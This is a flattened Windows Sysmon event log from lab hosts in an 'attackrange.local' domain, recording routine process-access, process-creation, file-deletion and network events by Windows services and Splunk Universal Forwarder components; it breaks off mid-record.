08:05:03.680{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108536Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.680{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5AF-615A-9402-00000000FC01}7808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108535Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.680{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5AF-615A-9402-00000000FC01}7808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108534Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.681{58E9C193-B5AF-615A-9402-00000000FC01}7808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000108533Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.287{58E9C193-B5AF-615A-9302-00000000FC01}13967380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108532Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5AF-615A-9302-00000000FC01}1396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108531Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108530Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108529Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108528Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108527Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5AF-615A-9302-00000000FC01}1396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108526Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.004{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5AF-615A-9302-00000000FC01}1396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108525Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:03.006{58E9C193-B5AF-615A-9302-00000000FC01}1396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108545Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:04.948{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3B70279ED2DD28BC877F6168C8F7348,SHA256=07C1B344F3810DD35FDB4DE081E9E26DFA29E81D5DE173BA114455DCC77F370B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084021Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:04.318{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B99206F840B61E4063D8AC7ED11B2605,SHA256=CD3ECDA6237026CD98C6BF181F7173EC01EC06BF12822A76D4BC5CF4F418C3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108544Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:04.017{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=214C2AA72D007A974937AB7216008CDC,SHA256=38F9A2758B4FCD6440AC794A01E558B10D81EC29480857BA20369273072ABB41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108554Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.978{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED01BFB8BA4F669FED85DF6DBE46F749,SHA256=79B298E0F47BAC314C098DDC6598CCE4CE7EA33448DF65279FFD2082EF80DC6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084022Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:05.490{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28B7F291F0B333342E2F231985134D5E,SHA256=78C147FA0DB12537B419EDBCF19BF5B4541692D6AF0308DE9FA7661D8158849B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108553Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5B1-615A-9502-00000000FC01}8544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108552Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108551Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108550Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108549Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108548Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5B1-615A-9502-00000000FC01}8544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108547Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.531{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5B1-615A-9502-00000000FC01}8544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108546Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:05.532{58E9C193-B5B1-615A-9502-00000000FC01}8544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108557Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:06.995{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B51487B0BA2BBD641EC5C23DFF7B2C,SHA256=15E203F2C20F9AA13D49FFD21A18FBDF69856A60B38C636758100BAB4ACA3079,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084024Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:04.706{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50208-false10.0.1.12-8000- 23542300x800000000000000084023Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:06.600{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2ECB9FDCD30EA5E8A58B4365F742A2E,SHA256=8D87EE2E3C401AD2E61F5EDA7BC46A73EDD0F10E936A9950B9F3990C1BD24978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108556Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:06.546{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E333642F6F816552E003315215162D9F,SHA256=B80906C1798E7832A1012984DB76C4998CD0549A1A73F940F07D6DA7E3323393,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108555Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:04.426{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51974-false10.0.1.12-8000- 23542300x800000000000000084025Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:07.615{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E994E5E56B20FBC6344EEFFEA7D357D,SHA256=C997030B6FD2C360DE3B6FDD30796D2D08076DD04B3281B7FF6576C2F73EFB97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084026Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:08.615{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B51BD140B5FD58D71C5E338B819B2DE6,SHA256=786E67F71CE9D7BD4614642D2E6F1E71CBBC5F7027C820F1E04BC7D92E123522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108558Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:08.015{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB44762F7B54E4660C0D3963C103561,SHA256=A64BC901E6B2E16D458411A19DC918A317A9B440E2637B6BB2593CF112297218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084027Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:09.662{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 